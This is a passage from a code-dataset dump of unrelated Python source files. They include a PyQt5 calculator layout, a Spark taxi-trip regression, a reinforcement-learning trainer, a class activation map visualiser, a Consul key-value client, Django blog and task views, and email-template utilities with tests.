saved!\")\n","sub_path":"generate_train_ann.py","file_name":"generate_train_ann.py","file_ext":"py","file_size_in_byte":2865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"362116585","text":"import sys\nfrom PyQt5.QtWidgets import (QApplication, QWidget, QGridLayout, QLabel, QLineEdit, QTextEdit, QPushButton)\n\n\nclass MyApp(QWidget):\n\n def __init__(self):\n super().__init__()\n self.initUI()\n def initUI(self):\n num1 = QPushButton('1')\n num2 = QPushButton('2')\n num3 = QPushButton('3')\n num4 = QPushButton('4')\n num5 = QPushButton('5')\n num6 = QPushButton('6')\n num7 = QPushButton('7')\n num8 = QPushButton('8')\n num9 = QPushButton('9')\n \n num0 = QPushButton('0')\n del_btn=QPushButton('del')\n plus_btn=QPushButton('+')\n minus_btn=QPushButton('-')\n\n grid = QGridLayout()\n self.setLayout(grid)\n# grid.addWidget(QLabel('Title:'), 0, 0)\n# grid.addWidget(QLabel('Author:'), 1, 0)\n# grid.addWidget(QLabel('Review:'), 2, 0)\n grid.addWidget(num7, 0, 0)\n grid.addWidget(QLineEdit(), 1, 1)\n grid.addWidget(QTextEdit(), 2, 1)\n self.setWindowTitle('QGridLayout')\n self.setGeometry(300, 300, 300, 200)\n self.show()\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n ex = MyApp()\n sys.exit(app.exec_())\n","sub_path":"ca.py","file_name":"ca.py","file_ext":"py","file_size_in_byte":1197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"180562158","text":"import sys\nassert sys.version_info >= (3, 5) # make sure we have Python 3.5+\nfrom pyspark.sql import SparkSession, SQLContext, functions, types\nfrom pyspark.sql import SQLContext, functions\nfrom pyspark.ml.regression 
import LinearRegression\nfrom pyspark.ml.evaluation import RegressionEvaluator\nfrom pyspark.ml.feature import VectorAssembler\nfrom pyspark.ml.feature import StandardScaler\nfrom pyspark.ml import Pipeline\nfrom pyspark.sql.functions import *\nspark = SparkSession.builder.appName('new stations').getOrCreate()\nassert spark.version >= '2.4' # make sure we have Spark 2.4+\nspark.sparkContext.setLogLevel('WARN')\nspark.conf.set(\"spark.sql.debug.maxToStringFields\", 1000)\nsc = spark.sparkContext\nsqlContext = SQLContext(sc)\n\n\ntaxi_data = spark.read.csv(r\"taxi_traffic.csv\", inferSchema=True, header=True)\n\ndf = taxi_data.filter(taxi_data['trip_distance'] < 20.0)\ndf = df.na.drop()\n\ndf = df.withColumn(\"pickup_datetime\", from_unixtime(unix_timestamp(df.pickup_datetime, \"yyyy-MM-dd HH:mm:ss\")))\ndf = df.withColumn(\"pickup_hour\", hour(df.pickup_datetime))\ndf = df.withColumn(\"pickup_month\", month(df.pickup_datetime))\n\ntime_diff = (functions.unix_timestamp('dropoff_datetime', \"yyyy-MM-dd HH:mm:ss\") -\n             functions.unix_timestamp('pickup_datetime', \"yyyy-MM-dd HH:mm:ss\"))/60\n\ndf = df.withColumn(\"duration_min\", time_diff)\ndf = df.withColumn(\"speed_mph\", df.trip_distance / (df.duration_min / 60))\n\n\n# 'travel_time' and 'velocity' are assumed to be columns already present in\n# taxi_traffic.csv; note that 'speed_mph' is derived from duration_min, so it\n# leaks the regression label defined below\nfeatures = ['passenger_count', 'trip_distance', 'rate_code', 'payment_type',\n            'fare_amount', 'extra', 'mta_tax', 'tip_amount', 'total_amount', 'travel_time',\n            'tolls_amount', 'imp_surcharge', 'velocity', 'pickup_hour', 'pickup_month', 'speed_mph']\n\n# use duration_min as the regression label\ndata = df.select(df.duration_min.alias(\"label\"), *features)\ndata = data.dropna()\n\n# split train and validation data\ntrain, validation = data.randomSplit([0.75, 0.25])\ntrain = train.cache()\nvalidation = validation.cache()\n\n# create a pipeline\nassembler = VectorAssembler(inputCols=features, outputCol=\"unscaled_features\")\nscaler = StandardScaler(inputCol=\"unscaled_features\", outputCol=\"features\", withStd=True, withMean=False)\nlr = LinearRegression(maxIter=10, regParam=0.3, elasticNetParam=0.8)\n\npipeline = Pipeline(stages=[assembler, scaler, lr])\n\nmodel = pipeline.fit(train)\n\n# create an evaluator and score the validation data\nevaluator = RegressionEvaluator(predictionCol=\"prediction\", labelCol=\"label\", metricName=\"rmse\")\n\nprediction = model.transform(validation)\n\n# Root Mean Square Error\nrmse = evaluator.evaluate(prediction)\nprint(\"RMSE: %.3f\" % rmse)\n# RMSE: 3.689\n","sub_path":"spark/taxi_ml_prediction.py","file_name":"taxi_ml_prediction.py","file_ext":"py","file_size_in_byte":2589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
{"seq_id":"248887897","text":"import shutil\n\nimport numpy as np\nfrom gym import Env\n\nfrom rltg.agents.RLAgent import RLAgent\nfrom rltg.agents.TGAgent import TGAgent\nfrom rltg.utils.Renderer import PixelRenderer, Renderer\nfrom rltg.utils.StatsManager import StatsManager\n\nimport os\n\ndef goal_perc_threshold(*args, **kwargs)->bool:\n    goal_history = kwargs[\"goal_history\"]\n    window_size = kwargs[\"window_size\"]\n    if len(goal_history) < window_size:\n        return False\n    # assumed criterion: the goal must be reached in at least 97% of the\n    # last window_size episodes (hence the 97.00 threshold)\n    goal_percentage = 100.0 * sum(goal_history[-window_size:]) / window_size\n    return goal_percentage >= 97.00\n\ndef check_automata_in_final_state(*args, **kwargs)->bool:\n    temporal_evaluators = kwargs[\"temporal_evaluators\"]\n    # all the automata have to be in their final state\n    return all(t.simulator.is_true() for t in temporal_evaluators)\n\n\n\nID2ACTION = {0: 2, 1: 3}\nclass Trainer(object):\n    def __init__(self, env:Env, agent:RLAgent, n_episodes=1000,\n                 eval=False,\n                 resume=False,\n                 renderer:Renderer=None,\n                 window_size=100,\n                 
stopping_conditions=(goal_perc_threshold, check_automata_in_final_state),\n agent_data_dir=\"agent_data\"):\n self.env = env\n self.agent = agent\n self.stopping_conditions = stopping_conditions\n self.n_episodes = n_episodes\n self.resume = resume\n self.eval = eval\n self.renderer = renderer\n self.window_size = window_size\n\n if not self.resume:\n shutil.rmtree(agent_data_dir, ignore_errors=True)\n os.mkdir(agent_data_dir)\n\n self.agent_data_dir = agent_data_dir\n\n if self.eval:\n self.agent.set_eval(self.eval)\n\n def main(self):\n agent = self.agent\n\n num_episodes = self.n_episodes\n last_goal = False\n stats = StatsManager(self.window_size)\n\n if self.resume:\n agent.load(self.agent_data_dir)\n\n # Main training loop\n for ep in range(num_episodes):\n\n # switch between training mode and evaluation mode\n # to check if policy reached is optimal.\n # only when in training mode\n steps, total_reward, goal = self.train_loop(try_optimal=self.eval or last_goal)\n last_goal = goal\n\n stats.update(len(agent.brain.Q), total_reward, goal)\n stats.print_summary(ep, steps, len(agent.brain.Q), total_reward, agent.exploration_policy.epsilon, goal)\n\n # stopping conditions\n if self.check_stop_conditions(agent, stats):\n break\n\n agent.reset()\n if not self.eval and ep % 100 == 0:\n agent.save(self.agent_data_dir)\n\n agent.save(self.agent_data_dir)\n stats.plot()\n\n\n def train_loop(self, try_optimal=False):\n env = self.env\n agent = self.agent\n total_reward = 0\n steps = 0\n\n state = env.reset()\n temporal_evaluators = agent.temporal_evaluators if isinstance(agent, TGAgent) else []\n\n done = False\n info = {\"goal\": False}\n\n # until the game is not ended and every temporal task is not failed\n while not done and all(not t.is_failed() for t in temporal_evaluators):\n action = agent.act(state, best_action=try_optimal)\n state2, reward, done, info = env.step(action)\n agent.observe(state, action, reward, state2)\n agent.replay()\n\n # add the observed reward (including the automaton reward)\n total_reward += agent.brain.obs_history[-1][2]\n steps += 1\n\n agent.update()\n state = state2\n\n if self.renderer:\n self.renderer.update(env)\n\n return steps, total_reward, info[\"goal\"]\n\n def check_stop_conditions(self, agent, stats):\n temporal_evaluators = agent.temporal_evaluators if isinstance(agent, TGAgent) else []\n if not self.eval and all([s(goal_history=stats.goals, temporal_evaluators=temporal_evaluators, window_size=self.window_size)\n for s in self.stopping_conditions]):\n return True\n\n return False\n","sub_path":"rltg/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":4124,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"102131377","text":"from PIL import Image\nfrom torchvision import models, transforms\nfrom torch.autograd import Variable\nfrom torch.nn import functional as F\nimport torch\nimport numpy as np\nimport cv2\nimport os\nimport argparse\nimport pickle\n\nCAM_DIR = '/data/vision/oliva/scratch/monica/CAM'\nFRAME_DIR ='/data/vision/oliva/scratch/monica/prediction_30fps'\n\nnum_classes = 2\nalpha = 0.75\n\n\nfeatures_blobs = []\ndef load_model(model_path):\n print ('loading net')\n net = torch.load(model_path)\n feature_names = [\"layer4\", \"avgpool\"]\n print ('setting net to eval')\n net.eval()\n def hook_feature(module, input, output):\n features_blobs.append(output.data.cpu().numpy())\n print ('registering forward hook')\n model = net._modules['model']\n for name in 
feature_names:\n model._modules.get(name).register_forward_hook(hook_feature)\n #print ('features blobs', features_blobs)\n return model\n\ndef returnCAM(feature_conv, weight_softmax, class_idx):\n # generate the class activation maps upsample to 256x256\n print ('returning CAM')\n size_upsample = (256, 256)\n bz, nc, h, w = feature_conv.shape\n output_cam = []\n for idx in class_idx:\n cam = weight_softmax[idx].dot(feature_conv.reshape((nc, h*w)))\n cam = cam.reshape(h, w)\n cam = cam - np.min(cam)\n cam_img = cam / np.max(cam)\n cam_img = np.uint8(255 * cam_img)\n output_cam.append(cv2.resize(cam_img, size_upsample))\n return output_cam\n\ndef extract_frames(video_name):\n print ('extracting frames')\n with open(os.path.join(CAM_DIR,'test_jan13_2_dict.p'), 'rb') as f:\n data = pickle.load(f)\n frames = data[video_name]\n frame_paths = [os.path.join(FRAME_DIR, video_name, f) for f in frames]\n images = [Image.open(frame).convert('RGB') for frame in frame_paths]\n return images\n\nnormalize = transforms.Normalize(\n mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225]\n)\npreprocess = transforms.Compose([\n transforms.Resize((224,224)),\n transforms.ToTensor(),\n normalize\n])\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"test CAM on a set of videos\")\n parser.add_argument('--video_name', type=str, default=None)\n args = parser.parse_args()\n \n frames = extract_frames(args.video_name)\n OUTPUT_DIR = os.path.join(CAM_DIR, args.video_name)\n if not os.path.exists(OUTPUT_DIR):\n os.mkdir(OUTPUT_DIR)\n model = load_model(\"incident_model.pth\")\n \n params = list(model.parameters())\n weight_softmax = np.squeeze(params[-2].data.cpu().numpy())\n weight_softmax[weight_softmax<0] = 0\n buffer = torch.FloatTensor(num_classes, 5).fill_(0)\n cam_buffer = torch.FloatTensor(5, 256, 256).fill_(0)\n\n for i in range(len(frames)):\n features_blobs = []\n print (\"processing image\")\n img_tensor = preprocess(frames[i])\n img_variable = Variable(img_tensor.unsqueeze(0).cuda(), volatile=True)\n print (\"running the image\")\n logit = model(img_variable)\n probs = F.softmax(logit).data.squeeze()\n frames[i] = np.array(frames[i])\n height, width, _ = frames[i].shape\n buffer[:,i%5] = probs\n probs = buffer.mean(1)\n #print (features_blobs)\n cam_buffer[i%5] = torch.FloatTensor(returnCAM(features_blobs[0], weight_softmax, [1])[0])\n CAM = cam_buffer.mean(0)\n CAM.add_(-CAM.min()).div_(CAM.max()).mul_(255)\n CAMs = np.uint8(CAM)\n heatmap = cv2.applyColorMap(cv2.resize(CAMs, (width, height)), cv2.COLORMAP_JET)\n frames[i] = frames[i]*0.6 + heatmap*0.4\n overlay = frames[i].copy()\n\n if probs[1] > 0.5:\n cv2.putText(overlay,\"incident\", (1, int(height/8)), cv2.FONT_HERSHEY_SIMPLEX, 2, (255, 255, 255), 2)\n cv2.addWeighted(overlay, alpha, frames[i], 1 - alpha, 0, frames[i])\n # frames[i] = np.flip(frames[i], 2)\n output_jpg = os.path.join(OUTPUT_DIR, \"%03d.jpg\" % i)\n print (\"writing\", output_jpg)\n cv2.imwrite(output_jpg, frames[i])\n","sub_path":"CAM/resnet_CAM.py","file_name":"resnet_CAM.py","file_ext":"py","file_size_in_byte":4019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"449776080","text":"import requests\nimport traceback\nimport os\n\nclass ConsulClient:\n def __init__(self, address):\n self.address = address\n\n def put_kv(self, key, value):\n data = value\n try:\n response = requests.put(f'{self.address}/v1/kv/{key}', data=data)\n if str(response.text) == 'true':\n print(f'posted value: {data}, 
for key: {key}')\n else:\n print(f'could not post value: {data}, for key: {key}')\n \n except:\n traceback.print_exc()\n os._exit(-1)\n \n def get_kv(self, key):\n try:\n response = requests.get(f'{self.address}/v1/kv/{key}')\n print(f'{response.text}')\n except:\n traceback.print_exc()\n os._exit(-1)\n \n def delete_kv(self, key):\n try:\n response = requests.delete(f'{self.address}/v1/kv/{key}')\n print(f'{response.text}')\n except:\n traceback.print_exc()\n os._exit(-1)\n\nif __name__ == \"__main__\":\n c = ConsulClient('http://127.0.0.1:8500/')\n c.put_kv('abc/def/ghi', 'aeiou')\n c.get_kv('abc/def/ghi')\n","sub_path":"consul/python_client.py","file_name":"python_client.py","file_ext":"py","file_size_in_byte":1160,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"624470898","text":"from django.shortcuts import get_object_or_404, render\n\nfrom . import models\nfrom taggit.models import Tag\n\nfrom blog.views import SidebarView\n\ndef post_list(request):\n \"\"\"\n List of all posts\n \"\"\"\n\n # get all the posts\n posts = models.Post.objects.order_by('-created_at')\n\n # get all of the months that have posts\n # empty months dict\n months = {}\n # for each post in posts\n for post in posts:\n # isolate the month\n post_month = post.created_at.strftime(\"%B\")\n # if the month doesn't exist in months yet\n if post_month not in months:\n # add the month to months\n months[post_month] = 1\n else:\n # increment the existing month by 1\n months[post_month] += 1\n\n # get all of the categories\n categories = models.Category.objects.order_by('name')\n\n # get all of the tags\n tags = Tag.objects.order_by('name')\n\n return render(request, 'app_blog/post_list.html', {'posts': posts, 'months': months, 'categories': categories, 'tags': tags})\n\ndef post_detail(request, slug):\n \"\"\"\n Individual post\n \"\"\"\n\n # get a single post\n post = get_object_or_404(models.Post, slug=slug)\n\n return render(request, 'app_blog/post_detail.html', {'post': post})\n","sub_path":"app_blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"559961990","text":"##############################################################################\n# Parte do livro Introdução à Programação com Python\n# Autor: Nilo Ney Coutinho Menezes\n# Editora Novatec (c) 2010-2020\n# Primeira edição - Novembro/2010 - ISBN 978-85-7522-250-8\n# Segunda edição - Junho/2014 - ISBN 978-85-7522-408-3\n# Terceira Edição - Janeiro/2019 - ISBN 978-85-7522-718-3\n#\n# Site: https://python.nilo.pro.br/\n#\n# Arquivo: exercicios3\\capitulo 09\\exercicio-09-10.py\n##############################################################################\n\nimport sys\n\nif len(sys.argv) < 2:\n print(\"\\nUso: e09-10.py arquivo1 [arquivo2 arquivo3 arquivoN]\\n\\n\\n\")\n sys.exit(1)\n\nsaída = open(\"saida_unica.txt\", \"w\", encoding=\"utf-8\")\nfor nome in sys.argv[1:]:\n arquivo = open(nome, \"r\", encoding=\"utf-8\")\n for linha in arquivo:\n saída.write(linha)\n arquivo.close()\nsaída.close()\n","sub_path":"exercicios_resolvidos3/exercicios3/capitulo 09/exercicio-09-10.py","file_name":"exercicio-09-10.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"425877362","text":"from django.shortcuts import render, redirect, HttpResponseRedirect\nfrom user_profile.models import 
UserProfile\nfrom task.models import Task, TaskForm, TaskAnswers\n\n\ndef create(request):\n return render(request, 'create_task.html', {'task_form': TaskForm, 'user_profile': UserProfile.objects.get_user_profile(request.user)})\n\n\ndef save(request):\n if request.method == 'POST':\n task = TaskForm(request.POST)\n if task.is_valid():\n new_task = task.save(commit=False)\n new_task.author = request.user\n new_task.save()\n # task = request.POST\n # name = task.name\n # topic = task.topic\n # level = task.level\n # content = task.content\n # author = request.user\n # Task.object.create_task(name, author, level, topic, content)\n return HttpResponseRedirect('/profile/')\n\n\ndef show(request):\n task_id = request.GET['id']\n user_profile = UserProfile.objects.get_user_profile(request.user)\n task = Task.objects.get(name=task_id)\n try:\n TaskAnswers.objects.get(task=task, user=request.user)\n is_solved = 'true'\n except TaskAnswers.DoesNotExist:\n is_solved = 'false'\n # task_answers = TaskAnswers.objects.get(task=task, user=request.user)\n\n # if task_answers:\n # is_solved = 'true'\n # for task_answer in task_answers:\n # if task_answer.user == request.user:\n # is_solved = 'true'\n return render(request, 'show_task.html', {'task': task, 'is_solved': is_solved, 'user_profile': user_profile})\n\n\ndef get_answer(request):\n task_id = request.GET['id']\n answer = request.POST['answer']\n task = Task.objects.get(name=task_id)\n user_profile = UserProfile.objects.get_user_profile(request.user)\n if answer == task.answer:\n try:\n TaskAnswers.objects.get(task=task, user=request.user)\n except TaskAnswers.DoesNotExist:\n task_answer = TaskAnswers()\n task_answer.task = task\n task_answer.user = request.user\n task_answer.save()\n rating = 0\n if task.level == 'easy':\n rating = 100\n elif task.level == 'medium':\n rating = 200\n else:\n rating = 300\n user_profile.rating += rating\n user_profile.save()\n return render(request, \"answer_handler.html\", {'answer': 'right', 'user_profile': user_profile})\n return render(request, 'answer_handler.html', {'task': task, 'answer': 'wrong', 'user_profile': user_profile})","sub_path":"TASKER/task/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"166500349","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport sys\n\narg1 = sys.argv[1] # input array\narg2 = sys.argv[2] # output picture name\n\ndef plot_xvg(ifile, ofile):\n data = np.genfromtxt(ifile)\n\n fig = plt.figure(dpi=300)\n ax = fig.add_subplot(111)\n\n plt.plot(data[:,0], data[:,1])\n\n plt.xlabel(\"Time (ps)\", fontsize=15)\n plt.ylabel(\"Entropy (kJ/mol)\", fontsize=15)\n\n labels = [i.get_text() for i in ax.get_xticklabels()]\n b = [u'0', u'100', u'200', u'300', u'400', u'500', u'600']\n ax.set_xticklabels(b)\n\n # save figure in EPS\n plt.savefig(\"%s.pdf\" % ofile, dpi=300) # save eps for publication\n plt.savefig(\"%s.tif\" % ofile, dpi=300) # save tif for quick preview\n\nif __name__ == \"__main__\":\n plot_xvg(arg1, arg2)\n","sub_path":"plot_entropy.py","file_name":"plot_entropy.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"600330706","text":"import cv2\nimport numpy as np\n\ndef mask(img, num_img, op_type=\"random_bgr\", *param):\n new_imgs = globals()[\"_\"+op_type+\"_mask\"](img, num_img, *param)\n return new_imgs\n\ndef _random_bgr_mask(img, 
num_img, b_min_range=-10, b_max_range=10, g_min_range=-10, g_max_range=10, r_min_range=-10, r_max_range=10):\n result_imgs = []\n\n for _ in range(num_img):\n\n b_noise = np.random.randint(b_min_range, b_max_range+1, img.shape[:2])\n g_noise = np.random.randint(g_min_range, g_max_range+1, img.shape[:2])\n r_noise = np.random.randint(r_min_range, r_max_range+1, img.shape[:2])\n\n result_img = img + np.dstack((b_noise,g_noise,r_noise))\n result_imgs.append(result_img)\n\n return result_imgs\n\n","sub_path":"infer_core/rcnn_infer/rcnn/io/data_process/mask.py","file_name":"mask.py","file_ext":"py","file_size_in_byte":727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"72872423","text":"from pyramid.response import Response\nfrom pyramid.view import view_config\nfrom textwrap import dedent\n\n\n@view_config(route_name='home',\n renderer='json',\n request_method='GET')\ndef home_view(request):\n \"\"\"\n \"\"\"\n message = dedent('\\n'\n 'GET / - the base API route\\n'\n 'POST /api/v1/auth/ - Registering a new account\\n'\n 'GET /api/v1/portfolio/{id}/ - for retrieving a user\\'s portfolio\\n'\n 'POST /api/v1/stock/ - for creating a new company record\\n'\n 'GET /api/v1/stock/{id}/ - for retrieving a companies information\\n'\n 'DELETE /api/v1/stock/{id} - for deleting a company record\\n'\n 'GET /api/v1/company/{symbol} - '\n 'for retrieving company detail from 3rd party API, where {symbol} is variable')\n\n return Response(body=message, status=200)\n\n","sub_path":"stocks_api/views/default.py","file_name":"default.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"85061909","text":"from slimmer import html_slimmer\nimport sys\n\nbase = open(\"bootstrap_form.html\", \"r\")\nhtml = base.read();\nbase.close()\n\nuscf = open(\"email_templates/usc.html\", \"r\")\nusc = uscf.read();\nuscf.close()\n\n\nsivcf = open(\"email_templates/sivc.html\", \"r\")\nsivc = sivcf.read();\nsivcf.close()\n\n\nsivuf = open(\"email_templates/sivu.html\", \"r\")\nsivu = sivuf.read();\nsivuf.close()\n\n\notherf = open(\"email_templates/other.html\", \"r\")\nother = otherf.read();\notherf.close()\n\n\nhtml=html_slimmer( html.strip().replace('\\n',' ').replace('\\t',' ').replace('\\r',' ') )\n\nhtml = html.replace(\"###USC-TEMPLATE###\", usc);\nhtml = html.replace(\"###SIVC-TEMPLATE###\", sivc);\nhtml = html.replace(\"###SIVU-TEMPLATE###\", sivu);\nhtml = html.replace(\"###OTHER-TEMPLATE###\", other);\nhtml = html.replace(\"###EMAIL###\", \"ACTF@state.gov\");\nhtml = html.replace(\"###EMAIL-SUBJECT###\", \"Afghanistan Email\");\n\nout = open(\"email.min.html\",\"w\")\nout.write(html)\nout.close()\n","sub_path":"compile.py","file_name":"compile.py","file_ext":"py","file_size_in_byte":926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"392936646","text":"import os\nimport sys\n\nimageFolder = sys.argv[1] # first arg is path to image folder\n\nimgExts = [\"png\", \"bmp\", \"jpg\"]\n\nfor path, dirs, files in os.walk(imageFolder):\n for fileName in files:\n ext = fileName[-3:].lower()\n if ext not in imgExts:\n continue\n oldName = os.path.join(path, fileName)\n filePath = oldName.replace(os.path.sep, '_')\n newName = os.path.join(path, filePath[filePath.index('ward_') + 5:])\n os.rename(oldName, newName)\n 
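# note: assumes every walked path contains 'ward_'; filePath.index('ward_') above raises ValueError otherwise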
\n\n\n","sub_path":"NeuralNet/addName.py","file_name":"addName.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"314021476","text":"#!/usr/bin/env python3\n\n# usage: python3 researchr_parse_colocated_events_from_ics.py --room SOAP --ics workshop-researchr-example.ics --json pldi-researchr-full.json\n\nimport argparse\nimport json\nimport re\n\nimport dateutil\nimport pytz\nimport requests\nimport unidecode\nfrom ics.icalendar import Calendar\n\n\ndef parse_arguments():\n parser = argparse.ArgumentParser(description=\"MiniConf Calendar Command Line\")\n\n parser.add_argument(\n \"--room\",\n default=\"SOAP\",\n type=str,\n help=\"Researchr room we're processing\",\n )\n\n parser.add_argument(\n \"--ics\",\n default=\"researchr.ics\",\n type=str,\n help=\"calendar entries from Researchr\",\n )\n\n parser.add_argument(\n \"--json\",\n default=\"researchr.json\",\n type=str,\n help=\"JSON file from Researchr\",\n )\n\n parser.add_argument(\"--out\", default=\"calendar.csv\", help=\"output file\")\n\n return parser.parse_args()\n\n\nresearchrToTrack = {\n \"SOAP\": \"soap\",\n \"PLDI Fake Track\": \"soap\",\n \"PLDI-A\": \"pldi-a\",\n \"PLDI-B\": \"pldi-b\",\n \"IMOP\": \"imop\",\n \"PLMW@PLDI\": \"plmw\",\n \"ARRAY\": \"array\",\n \"LCTES\": \"lctes\",\n \"HOPL IV\": \"hopl\",\n \"ISMM\": \"ismm\",\n \"PLanQC\": \"planqc\",\n \"Infer Practitioners\": \"infer\",\n \"MAPS\": \"maps\",\n \"PLDI Tutorials\": \"tutorials\",\n}\n\n\ndef makeISO(date, time):\n return date + \"T\" + time + \":00-04:00\"\n\n\ndef sessionTime(session):\n times = session[\"Time\"].split(\" - \")\n start = makeISO(session[\"Day\"], times[0])\n return start\n\n\ndef typeOfEvent(jsonData, key):\n return [x[\"Type\"] for x in jsonData[\"Items\"] if x[\"Key\"] == key][0]\n\n\ndef collectEventKeys(jsonData, room):\n sessions = [\n s\n for s in jsonData[\"Sessions\"]\n if (s[\"Location\"].split(\"Online | \")[1] == room and \"Items\" in s)\n ]\n sortedEvents = list(sorted(sessions, key=sessionTime))\n events = [e for s in sortedEvents for e in s[\"Items\"]]\n return events\n\n\ndef chairsForEvent(jsonData, key):\n for s in jsonData[\"Sessions\"]:\n if key in s.get(\"Items\", []):\n return s.get(\"ChairsString\", \"\")\n return \"\"\n\n\ndef convert(args):\n\n file_ics: str = args.ics\n if not file_ics.startswith(\"http\"):\n with open(file_ics, \"r\") as f:\n c = Calendar(f.read())\n else:\n c = Calendar(requests.get(file_ics).text)\n\n file_json: str = args.json\n with open(file_json, \"r\") as f:\n jsonData = json.load(f)\n\n types = [\n (typeOfEvent(jsonData, x), chairsForEvent(jsonData, x))\n for x in collectEventKeys(jsonData, args.room)\n ]\n\n regex = \"\\[([^\\\\]]*)\\] (.*)\"\n pattern = re.compile(regex)\n\n eastern = pytz.timezone(\"US/Eastern\")\n\n with (open(args.out, \"w\")) as f:\n f.write(\"event,date,start,end,title,authors,notes,session chairs\\n\")\n roomEvents = [\n x\n for x in c.events\n if x.location.split(\" - \")[0].strip() == args.room\n and x.name.startswith(\"[\")\n ]\n sortedEvents = list(sorted(roomEvents, key=lambda c: c.begin))\n assert len(types) == len(sortedEvents)\n for e, (t, chairs) in zip(sortedEvents, types):\n parts = e.name.rsplit(\" - \", 1)\n title = parts[0]\n m = pattern.match(title)\n event = researchrToTrack[m.group(1).strip()]\n title = m.group(2)\n if len(parts) > 1:\n authors = parts[1].split(\", \")\n else:\n authors = \"\"\n\n authors = \", \".join(authors)\n authors = 
unidecode.unidecode(authors)\n\n if chairs != \"\":\n chairs = f',\"{chairs}\"'\n\n if t != \"Social Event\":\n extra = \"\"\n if t == \"Live Q&A\":\n extra = \"Discussion or post-talk Q&A in Zoom\"\n\n f.write(\n f'{event},{e.begin.astimezone(None).strftime(\"%Y-%m-%d\")},{e.begin.astimezone(None).strftime(\"%H:%M\")},{e.end.astimezone(None).strftime(\"%H:%M\")},\"{title}\",\"{authors}\",\"{extra}\"{chairs}\\n'\n )\n\n\nif __name__ == \"__main__\":\n args = parse_arguments()\n convert(args)\n","sub_path":"scripts/researchr_parse_colocated_events_from_ics_for_slideslive.py","file_name":"researchr_parse_colocated_events_from_ics_for_slideslive.py","file_ext":"py","file_size_in_byte":4144,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"209202284","text":"from django.test import TestCase, override_settings\nfrom django.contrib.auth.models import User\nfrom django.core import mail\nfrom unittest.mock import patch, Mock, MagicMock\nfrom django.template.backends.django import Template\nfrom django.conf import settings\nfrom html2text import html2text\nfrom requests.models import Response\n\nfrom app.models import Goal, Email\n\nfrom app import utils\n\n\nclass UtilsTest(TestCase):\n def setUp(self):\n self.user = User.objects.create(email='user@real.com')\n\n @patch('app.utils.email_signal')\n @patch('app.utils.loader')\n @patch('django.core.mail.utils.socket')\n @override_settings(EMAIL_META={'test': {'subject': 'Test Subject'}})\n def test_send_email(self, socket, loader, email_signal):\n socket.getfqdn = Mock(return_value='test')\n\n goal = Mock(spec=Goal)\n\n body = 'some email body'\n\n template = Mock(spec=Template)\n template.render.return_value = body\n loader.get_template = Mock(return_value=template)\n\n utils.send_email('test', self.user, goal)\n\n loader.get_template.assert_called_once_with('emails/test.html')\n template.render.assert_called_once_with({\n 'user': self.user,\n 'goal': goal,\n 'BASE_URL': settings.BASE_URL,\n 'TWITTER_URL': settings.TWITTER_URL,\n 'FACEBOOK_URL': settings.FACEBOOK_URL,\n 'TRACKING': False,\n })\n\n self.assertEquals(1, len(mail.outbox))\n message = mail.outbox[0]\n\n self.assertEquals(message.subject, 'Test Subject')\n self.assertEquals(message.from_email,\n 'Bec and Chris ')\n self.assertEquals(message.to, [self.user.email])\n\n self.assertEquals(message.body, html2text(body))\n self.assertEquals(message.alternatives[0], (body, 'text/html'))\n\n self.assertEquals(message.extra_headers, {\n 'category': 'test'\n })\n\n emails = Email.objects.filter(recipient=self.user)\n self.assertEquals(emails.count(), 1)\n email = emails.first()\n self.assertEquals(email.name, 'test')\n\n email_signal.send.assert_called_with('app.utils.send_email',\n email=email)\n\n def test_send_email_raises_on_inactive_user(self):\n user = MagicMock(spec=User)\n user.is_active = False\n user.email = 'test'\n\n with self.assertRaises(ValueError):\n utils.send_email('test', user)\n\n @override_settings(DEBUG=False)\n @patch('app.utils.keen')\n def test_add_event_debug(self, keen):\n utils.add_event('test', self.user, {'foo': 'bar'})\n\n self.assertFalse(keen.add_event.called)\n","sub_path":"app/tests/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":2721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"174093367","text":"#! 
